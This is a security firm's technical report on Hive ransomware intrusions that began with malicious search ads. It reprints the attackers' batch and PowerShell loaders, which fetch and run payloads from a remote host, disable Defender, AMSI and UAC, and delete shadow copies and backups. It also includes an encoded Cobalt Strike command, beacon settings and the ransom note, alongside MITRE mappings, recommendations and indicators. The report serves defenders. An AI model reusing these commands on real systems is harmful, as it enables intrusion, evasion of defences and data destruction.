# Hive Ransomware Analysis | Kroll

**[kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery](https://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery)**

### Cyber Risk

Thu, Feb 2, 2023

## Hive Ransomware Technical Analysis and Initial Access Discovery

Stephen Green


-----

Elio Biasiotto

_Hive has been seized by law enforcement, but we're likely to still see these initial access_
_methods and tactics used across other threat actor groups._

Kroll has observed an increase in Hive ransomware incidents across a wide range of
industry verticals. A new trend of initial infection vector (IIV) has been identified by Kroll
analysts that may relate to the increase of activity and the varying nature of targets. Across a
number of incidents, the IIV was attributed to IT administrators looking to download common
softwares from Google such as TeamViewer, Zoom and AnyDesk, and they were provided
with advertisements for these tools at the top of their search results. We recently [reported on](https://www.kroll.com/en/insights/publications/cyber/threat-actors-google-ads-deploy-vidar-stealer)
this trend, where threat actors were abusing Google Ads to deploy malware via downloads.

When these IT administrators downloaded the desired “tools” from the malicious ad links,
Batloader was also unknowingly delivered. Batloader is an initial access malware utilized to
deliver tools such as Zloader, Ursnif and Vidar to further establish the threat actor’s foothold
within a network. Cobalt Strike can then be installed to maintain command and control. Once
the threat actor has acquired credentials and identified sensitive files for exfiltration, they are
[able to utilize common exfiltration tools such as WinSCP and Rclone to extract a victim’s](https://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone)


-----

data. The ransomware binary is then executed with a specific identifiable encryption key and
this is used to create the ransom note named “HOW_TO_DECRYPT.txt” and appends a
specific file extension related to a dropped key file within the root of C:\.

A login is provided for the victim to access the Hive “Sales Department” onion site, and if
demands are not met, data is then shared on their “Hive Leak” onion site.

## Timeline of Incident

### Initial Exploit

In a recent case, after the IT administrator searched for TeamViewer and clicked the
advertisement link, they were directed to https://caroseyama[.]xyz/9hjLXZR?
https://www.teamviewer[.]com/en/customer-support. This link then redirected to
https://teamviewclouds[.]com/index.php. Our experts analyzed the teamviewclouds domain
and identified a large number of similar typosquatted domains for a wide range of common
software hosted on the same IP address and hosted by regprivate[.]ru.  Most of these
domains were inactive, which suggests that the threat actors are continually creating new
advertisements. An installation file is then provided from
https://dc444.4sync[.]com/download/fXx-c_iZ/InstallerV36__218_.zip, which is the Batloader
.msi file. The file sharing provider 4sync has been identified across separate Batloader
incidents and appears to serve the Batloader .msi download.
```
zoomyclouds[.]com, zoomedes[.]com, zohosz[.]com, teamviewerq[.]com, teamviewercloudcomputing[.]com, teamviewclous[.]com, teamviewclouds[.]com,
teamcloudcomputing[.]com, staroness[.]com, standartnotess[.]com, slackicorp[.]com,
programmbatcheck[.]com, openofficee[.]com, logmein-cloud[.]com, logcloudmein[.]com,
gimpimage[.]com, foxitr[.]com, fortinetq[.]com, fidelyclouds[.]com,
evernotcorp[.]com, dom82[.]net, cloudsslack[.]com, anydeskos[.]com, anydeskis[.]com,
anyclouddesk[.]com, adubecorp[.]com

```
Figure 1: Example of Typosquatted domains associated with teamviewclouds[.]com


-----

[The installer itself installed novaPDF by Softland rather than TeamViewer and dropped](https://www.novapdf.com/)
PowerShell scripts “scrED95.ps1” and “pssEDC6.ps1”. “pssEDC6.ps1” is a conversion script
that creates the initial downloader script “scrED95.ps1”. This script downloads the initial
Batloader script “update.bat” and sets the working directory to the user’s appdata local
directory. The scripts are executed by PowerShell as shown in figure 2.
```
powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File
"C:\Users\user\AppData\Local\Temp\pssEDC6.ps1" -propFile
"C:\Users\user\AppData\Local\Temp\msiED94.txt" -scriptFile
"C:\Users\user\AppData\Local\Temp\scrED95.ps1" -scriptArgsFile
"C:\Users\user\AppData\Local\Temp\scrED96.txt" -propSep " :<->: " -testPrefix
"_testValue."

```
Figure 2: PowerShell command to create initial downloader
```
Set-Location "$Env:USERPROFILE\AppData\Roaming"

Invoke-RestMethod -Uri
https://cloudupdatesss[.]com/g5i0nq/index/e6a5614c379561c94004c531781ee1c5/?
servername=msi -OutFile update.bat

Start-Process -WindowStyle hidden -FilePath
"$Env:USERPROFILE\AppData\Roaming\update.bat

```
Figure 3: scrED95.ps1

MITRE ATT&CK: T1583.001: Acquire Domain Names

MITRE ATT&CK: T1608.004: Stage Capabilities - Drive-by Target
MITRE ATT&CK: T1588: Obtain Capabilities

MITRE ATT&CK: T1189: Drive-by Compromise

### Toolkit Deployment and Escalation

To maintain persistence and to gain increased privileges, Hive actors leverage Batloader to
download Ursnif and Vidar, but also attempt to gain the highest privileges possible to install
the malware. The initial Batloader script downloads “requestadmin.bat” and attempts to
[execute it with evaluated privileges by nircmd.exe.](https://www.nirsoft.net/utils/nircmd.html)
```
powershell Invoke-WebRequest
https://cloudupdatesss[.]com/g5i0nq/index/f69af5bc8498d0ebeb37b801d450c046/?
servername=msi -OutFile requestadmin.bat

powershell Invoke-WebRequest
https://cloudupdatesss[.]com/g5i0nq/index/c003996958c731652178c7113ad768b7/?
servername=msi -OutFile nircmd.exe

cmd /c nircmd elevatecmd exec hide "requestadmin.bat"

ping 127.0.0.1 -n 20

```
Figure 4: update.bat


-----

The requestadmin.bat then attempts to download further scripts named runanddelete.bat
and “scripttodo.ps1”. The script itself also attempts to whitelist specific paths from Windows
[Defender before downloading Nsudo.exe. Nsudo provides capabilities to execute binaries](https://nsudo.m2team.org/en-us/)
with elevated privileges, which are then used to edit the system registry to disable the user
access control prompt and to disable task manager and other registry tools. The Windows
power system settings tool Powercfg is then executed to disable sleep, which will allow the
threat actor to maintain persistent access.


-----

```
set pop %systemroot%

cd %APPDATA%

powershell Invoke-WebRequest
https://cloudupdatesss[.]com/g5i0nq/index/a3874ddb552a5b45cade5a2700d15587/?
servername=msi -OutFile runanddelete.bat

cd %APPDATA%

powershell Invoke-WebRequest
https://cloudupdatesss[.]com/g5i0nq/index/fa777fbbb8f055cb8bfcba6cb41c62e7/?
servername=msi -OutFile scripttodo.ps1

start /b PowerShell -NoProfile -ExecutionPolicy Bypass -Command "&
'./scripttodo.ps1'"

del nircmd.exe

cmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive Command Add-MpPreference -ExclusionPath '%USERPROFILE%\AppData\Roaming'

cmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive Command Add-MpPreference -ExclusionPath '%USERPROFILE%\AppData\Roaming\'

--- <snip> --
powershell Invoke-WebRequest https://raw.githubusercontent[.]com/swagkarna/BypassTamper-Protection/main/NSudo.exe -outfile Nsudo.exe

set pop=%systemroot%

NSudo -U:T -ShowWindowMode:Hide reg add
"HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v
"ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f

NSudo -U:T -ShowWindowMode:Hide reg add "HKLM\Software\Policies\Microsoft\Windows
Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f

NSudo -U:T -ShowWindowMode:Hide reg add
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
/t REG_DWORD /d "1" /f

NSudo -U:T -ShowWindowMode:Hide reg add
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableCMD" /t
REG_DWORD /d "1" /f

NSudo -U:T -ShowWindowMode:Hide reg add
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v
"DisableRegistryTools" /t REG_DWORD /d "1" /f

NSudo -U:T -ShowWindowMode:Hide reg add
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t
REG_DWORD /d "1" /f

powercfg.exe /SETACVALUEINDEX SCHEME_CURRENT SUB_VIDEO VIDEOCONLOCK 1800

powercfg -change -standby-timeout-dc 3000

powercfg -change -standby-timeout-ac 3000

start /b "" cmd /c del "%~f0"&exit /b

```
Figure 5: requestadmin.bat

The script “runanddelete.bat” appears to be a modified open-source script named “getadmin.bat”. This script attempts to spawn the user access control prompt to gain the
increased privileges to then spawn an Administrator shell, via a created file named


-----

getadmin.vbs . Once increased privileges are achieved, it then attempts to run Ursnif
(d2ef5.exe). Ursnif can be used to extract system information and seek to steal user
credentials.
```
@echo off

title Installing Packages

:: BatchGotAdmin

::------------------------------------
REM --> Check for permissions

>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"

REM --> If error flag set, we do not have admin.

if '%errorlevel%' NEQ '0' (

  echo Requesting administrative privileges...

  goto UACPrompt

) else ( goto gotAdmin )

:UACPrompt

  echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"

  set params = %*:"="

  echo UAC.ShellExecute "cmd.exe", "/c %~s0 %params%", "", "runas", 0 >>
"%temp%\getadmin.vbs"

  "%temp%\getadmin.vbs"

  del "%temp%\getadmin.vbs"

  exit /B

:gotAdmin

echo Installing Necessary Packages.....Please Wait.....

cd %APPDATA%

start /b d2ef5.exe


```
Figure 6: runanddelete.bat

[The script “scripttodo.ps1” initially installs GNU Privacy Guard for Windows (“Gpg4Win”),](https://www.gpg4win.org/)
which is a file encryption software. Vidar binaries are then downloaded and decrypted by
Gpg4Win along with a further attempt to download Nsudo.exe. The Vidar binaries are then
executed, likely in an attempt to further gather system information and to gather credentials.
The script also creates exclusions in the registry to prevent Windows Defender alerting on
execution.


-----

```
param

     (

          [Parameter(Mandatory)]

          [ValidateNotNullOrEmpty()]

          [string]$DownloadFolderPath,

          [Parameter()]

          [ValidateNotNullOrEmpty()]

          [string]$DownloadUrl = 'http://files.gpg4win[.]org/gpg4win-2.2.5.exe'

     )

--- <snip> --
if ($Condition_All )

{

  $URL =
"https://cloudupdatesss[.]com/t1mw0r/index/d2ef590c0310838490561a205469713d/?
servername=msi&arp="+ $IP_count + "&domain=" + $UserDomain + "&hostname=" +
$UserPCname

  $URL1 =
"https://cloudupdatesss[.]com/t1mw0r/index/i850c923db452d4556a2c46125e7b6f2/?
servername=msi&arp="+ $IP_count + "&domain=" + $UserDomain + "&hostname=" +
$UserPCname

  $URL2 =
"https://cloudupdatesss[.]com/t1mw0r/index/b5e6ec2584da24e2401f9bc14a08dedf/?
servername=msi&arp="+ $IP_count + "&domain=" + $UserDomain + "&hostname=" +
$UserPCname

     Invoke-WebRequest $URL -outfile p9d2s.exe.gpg

     Invoke-WebRequest $URL1 -outfile p9d2.bat

     Invoke-WebRequest $URL2 -outfile ata.exe.gpg

}

--- <snip> --
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FEB9D127C57AFE}" -Recurse

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

$uri = 'https://raw.githubusercontent.com/adbertram/Random-PowerShellWork/master/Security/GnuPg.psm1'

$moduleFolderPath = 'C:\Program Files\WindowsPowerShell\Modules\GnuPg'

$null = New-Item -Path $moduleFolderPath -Type Directory

Invoke-WebRequest -Uri $uri -OutFile (Join-Path -Path $moduleFolderPath -ChildPath
'GnuPg.psm1')

$env:APPDATA

Install-GnuPG -DownloadFolderPath $env:APPDATA

echo "START"

Add-MpPreference -ExclusionExtension “exe”

Add-MpPreference -ExclusionExtension “dll”

Remove-Encryption -FolderPath $env:APPDATA -Password '105b'

Invoke-WebRequest https://raw.githubusercontent[.]com/swagkarna/Bypass-Tamper
```

-----

```
Protection/main/NSudo.exe outfile Nsudo.exe

.\p9d2s.exe

.\ata.exe

.\p9d2.bat

```
Figure 7: scripttodo.ps1 snippets

MITRE ATT&CK: T1059: Command and Scripting Interpreter

MITRE ATT&CK: T1064: Scripting

MITRE ATT&CK: T1548.002: Bypass User Account Control

MITRE ATT&CK: T1222: File and Directory Permissions Modification

MITRE ATT&CK: T1583.001: Acquire Domain Names

MITRE ATT&CK: T1027: Obfuscated Files
MITRE ATT&CK: T1056: Input Capture

The post-exploitation tool Cobalt Strike is often leveraged to provide command and control,
utilizing both HTTP and SMB beacons to move laterally and report back to the threat actor’s
infrastructure.
```
{

 "BeaconType": [

  "HTTP"

 ],

 "Port": 80,

 "SleepTime": 45000,

 "MaxGetSize": 1403644,

 "Jitter": 37,

 "C2Server": "softeruplive[.]com,/jquery-3.3.1.min.js",

 "HttpPostUri": "/jquery-3.3.2.min.js",

 "Malleable_C2_Instructions": [

  "Remove 1522 bytes from the end",

  "Remove 84 bytes from the beginning",

  "Remove 3931 bytes from the beginning",

  "Base64 URL-safe decode",

  "XOR mask w/ random key"

 ],

 "SpawnTo": "AAAAAAAAAAAAAAAAAAAAAA==",

 "HttpGet_Verb": "GET",

 "HttpPost_Verb": "POST",

--- <SNIP> --
```
Figure 8: Cobalt Strike HTTP beacon

MITRE ATT&CK: T1001: Data Obfuscation

MITRE ATT&CK: T1573.001: Encrypted Channel: Symmetric Cryptography


-----

If required, the threat actors have also used minidump and ProcDump to dump the LSASS
process. This is likely an attempt to dump NTLM credential hashes for password cracking, or
for pass the hash techniques. PowerSploit has also been identified with attempts to run
“Invoke-Kerberoast” to gain Kerberos ticket hashes for service accounts. This would likely
provide the threat actor with increased privileges or access if successful.

MITRE ATT&CK: T1003.001: Credential Dumping – LSASS Memory

MITRE ATT&CK: T1558.003: Kerberoasting

MITRE ATT&CK: T1550: Use Alternate Authentication Material

Common remote access software such as Splashtop can be installed via Cobalt Strike to
provide a persistent, seemingly legitimate access to the network. This also allows the threat
actor to conduct hands-on operations. Remote Desktop Protocol (RDP) is used with
legitimate accounts to navigate across the network.

MITRE ATT&CK: T1219: Remote Access Software

MITRE ATT&CK: T1021: Remote Services

### Internal Scouting

Once the threat actor gains a foothold within the network, Kroll has observed the use of tools
such as [ADFind to identify accounts and servers. Other common tools such as nslookup and](https://attack.mitre.org/software/S0552/)
whoami have also been used to gain initial system information.

The Exchange PowerShell module Get-DomainController has also been identified when
leveraging Cobalt Strike to execute commands. This module provides information on the
domain controller for the local domain.
```
powershell -nop -exec bypass -EncodedCommand
SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEA
G8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AbABvAGMAYQBsAGgAbwBzAHQAOg
A3ADUANwAyAC8AJwApADsAIABHAGUAdAAtAEQAbwBtAGEAaQBuAEMAbwBuAHQAcgBvAGwAbABlAHIA

---Decoded Base64 string--
IEX (New-Object Net.Webclient).DownloadString('http://localhost:7572/'); GetDomainController

```
Figure 9: Example of Cobalt Strike commands

MITRE ATT&CK: T1482: Domain Trust Discovery

MITRE ATT&CK: T1087: Account Discovery

MITRE ATT&CK: T1016: System Network Configuration Discovery

### Mission Execution


-----

The threat actors look to identify sensitive files for exfiltration before encrypting devices by
using tools such as Rclone to automate data extraction to cloud storage. Kroll has observed
that threat actors have searched for files using PowerShell and manual traversal across files.

MITRE ATT&CK: T1005: Data from Local System

MITRE ATT&CK: T1567.002: Exfiltration Over Web Service : Exfiltration to Cloud Storage

MITRE ATT&CK: T1020: Automate Exfiltration

To push the ransomware binary across the network, the sysinternals tool PsExec has been
leveraged as well as custom scripts to deploy the encryptor. The ransomware binary itself
appears to come in both 64 and 32 bit versions. To encrypt, the binary requires the login and
password ".\windows_x64_encrypt.exe -u login:password”. There are other options available
for file encryption including:

-local-only: Encrypt only local files.
-no-discovery: Do not look for network shares.
-explicit-only: Encrypt specific directories.

By default, the binary prevents recovery by deleting volume shadow copies “vssadmin.exe
delete shadows /all /quiet” and deletes system backups with “wbadmin.exe delete
systemstatebackup” and “wbadmin.exe delete catalog-quiet” before preventing recovery from
boot with “\bcdedit.exe /set {default} recoveryenabled No” and “bcdedit.exe" /set {default}
[bootstatuspolicy ignoreallfailures”. The binary encrypts files, except for “.lnk” files and](https://www.microsoft.com/en-us/security/blog/2022/07/05/hive-ransomware-gets-upgrades-in-rust/)
binaries within “C:\windows”, before generating two key files in the root of C:\. The key files
also determine the extension string added to the encrypted files along with a base64
encoded pointer.


-----

```
Your network has been breached and all data were encrypted.          

Personal data, financial reports and important documents are ready to disclose.

To decrypt all the data and to prevent exfiltrated files to be disclosed at  

http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd[.]onion/    

you will need to purchase our decryption software. 

Please contact our sales department at: 

  http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd[.]onion/   

   Login: <redacted>

   Password: <redacted>

To get an access to .onion websites download and install Tor Browser at:   

  https://www.torproject[.]org/ (Tor Browser is not related to us)

Follow the guidelines below to avoid losing your data: 

 - Do not modify, rename or delete *.key files. Your data will be       

  undecryptable.                               

 - Do not modify or rename encrypted files. You will lose them.        

 - Do not report to the Police, FBI, etc. They don't care about your business.

  They simply won't allow you to pay. As a result you will lose everything. 

 - Do not hire a recovery company. They can't decrypt without the key.    

  They also don't care about your business. They believe that they are    

  good negotiators, but it is not. They usually fail. So speak for yourself. 

 - Do not reject to purchase. Exfiltrated files will be publicly disclosed.

```
Figure 10: HOW_TO_DECRYPT.txt

MITRE ATT&CK: T1570 : Lateral Tool Transfer

MITRE ATT&CK: T1490 : Inhibit System Recovery

MITRE ATT&CK: T1486 : Data Encrypted for Impact

Once data has been extracted and encrypted, victims are directed to their customer page to
negotiate the ransom fee. If a fee is not agreed, then victims could be placed onto their
shaming site: “HiveLeaks.”


-----

Figure 11: HiveLeaks Shaming Site

## Mitre ATT&CK Mapping

**Tactic** **Technique** **Procedure**

TA0042 T1566.002 Acquire Domain Names

T1588.001 Obtain Capabilities - Malware

T1588.002 Obtain Capabilities - Tool

T1608.004 Stage Capabilities - Drive-by
Target

TA0001 T1189 Drive-by Compromise

TA0002 T1059 Command and Scripting Interpreter

T1064 Scripting

T1204 User Execution


-----

T1072 Software Deployment Tools

TA0003 T1078 Valid Accounts

T1543.003 Create or Modify System Process Windows Service

TA0004 T1548.002 Bypass User Account Control

T1134 Access Token Manipulation

TA0005 T1548.002 Bypass User Account Control

T1222 File and Directory Permissions
Modification

T1070 Indicator Removal

T1027 Obfuscated Files

T1550 Use Alternate Authentication
Material

T1078 Valid Accounts

TA0006 T1056 Input Capture

T1003.001 Credential Dumping - LSASS
Memory

T1558.003 Steal or Forge Kerberos Tickets Kerberoasting

TA0007 T1482 Domain Trust Discovery

T1087 Account Discovery


-----

T1016 System Network Configuration
Discovery

TA0008 T1021 Remote services

T1570 Lateral Tool Transfer

TA0009 T1005 Data from Local System

TA0011 T1219 Remote Access Software

T1573.001 Encrypted Channel: Symmetric
Cryptography

T1001 Data Obfuscation

TA0010 T1567.002 Exfiltration Over Web Service:
Exfiltration to Cloud Storage

T1020 Automate Exfiltration

TA0040 T1490 Inhibit System Recovery

T1486 Data Encrypted for Impact

## Recommendations

Kroll has identified recommendations relating to this alert:

**Recommendation** **Observation**


Monitor PowerShell execution

Ensure PowerShell is logged,
and create detections for
encoded script execution.


The threat actor utilized Cobalt Strike. Monitoring
PowerShell execution can identify malicious activity
associated with Cobalt Strike.


-----

Enable credential guard

[Windows Credential Guard can](https://learn.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard)
provide protection against
password extraction and other
authentication attacks.

Audit user, administrator and
service accounts

Ensure accounts have the
correct access and privileges.
Implement the principle of least
privilege.

Implement multi-factor
authentication

Multi-factor authentication can
restrict access to sensitive areas
and can prevent lateral
movement.

Review backup strategies

Ensure multiple backups are
taken and at least one backup is
isolated from the network.


The threat actor dumped LSASS and conducted
Kerberos attacks. Credential guard can offer some
protection against these attacks.

The threat actor is often able to install tools on user
endpoints. Limiting the privileges of users can prevent
a threat actor from installing malicious software.

Enabling multi-factor authentication can prevent a
threat actor from moving laterally and accessing
sensitive data.

As a ransomware actor’s main aim is to disrupt
business, ensuring a viable backup and recovery
strategy is in place can allow a business to recover
quickly.


Review remote access tools Threat actors leverage legitimate remote access tools
to maintain persistence. Ensure remote access is
monitored and that only approved remote access tools
exist in the environment.

## Indicators of Compromise

The following files and hashes have been identified for the incident:

**File Name** **Comment** **MD5 Hash Value**

InstallerV36 (244).msi Batloader MSI 66a0bfcb41071d971f6003de9c2d2840

Scripttodo.ps1 Batloader Script ab60761a7016b2b2b883e3a15ef4fecc


-----

**File Name** **Comment** **MD5 Hash Value**

Requestadmin.bat Batloader Script 10fcffe4ad2cb37d6dc351ff975b0058

Runanddelete.bat Batloader Script 5cb9d80f82f674b065c3d80816a370c4

Update.bat Batloader Script bcf4f2d188a9b855a5e198ad8fbff500


Procdump64.exe ProcDump64 used
to dump LSASS


170637b901dc67cda3d905a714096a7f


Find.exe Renamed ADfind df5ce1159ef2e257df92e1825d786d87


windows_x64_encrypt.exe Ransomware
Binary


8fba0d57696ccf672ddcea4ba4d0e885


gpg4win-2.2.5.exe GNU Privacy Guard 67a4f35cae2896e3922f6f4ab5966e2b

f827.exe Syncro Installer 58f8600ee94571beff3224f75601f0fa

The following external IP addresses were observed during the incident:

**IP Address** **Comment**

46.30.42[.]56 caroseyama[.]xyz

194.67.119[.]190 cloudupdatesss[.]com

45.8.158[.]104 http://45.8.158[.]104/uploaded

37.140.192[.]70 teamviewclouds[.]com

## Stay Ahead with Kroll

### Cyber Risk


-----

Incident response, digital forensics, breach notification, managed detection services,
penetration testing, cyber assessments and advisory.

### 24x7 Incident Response

Enlist experienced responders to handle the entire security incident lifecycle.

### Computer Forensics

Kroll's computer forensics experts ensure that no digital evidence is overlooked and assist at
any stage of an investigation or litigation, regardless of the number or location of data
sources.

### Cyber Risk Retainer

Kroll delivers more than a typical incident response retainer—secure a true cyber risk
retainer with elite digital forensics and incident response capabilities and maximum flexibility
for proactive and notification services.

### Ransomware Preparedness Assessment

Kroll’s ransomware preparedness assessment helps your organization avoid ransomware
attacks by examining 14 crucial security areas and attack vectors.

### Data Recovery and Forensic Analysis

Kroll's expertise establishes whether data was compromised and to what extent. We uncover
actionable information, leaving you better prepared to manage a future incident.

### Business Email Compromise (BEC) Response and Investigation

In a business email compromise (BEC) attack, fast and decisive response can make a
tremendous difference in limiting financial, reputational and litigation risk. With decades of
experience investigating BEC scams across a variety of platforms and proprietary forensic
tools, Kroll is your ultimate BEC response partner.

### Incident Remediation and Recovery Services

Cyber incident remediation and recovery services are part of Kroll’s Complete Response
capabilities, expediting system recovery and minimizing business disruption.

Return to top


-----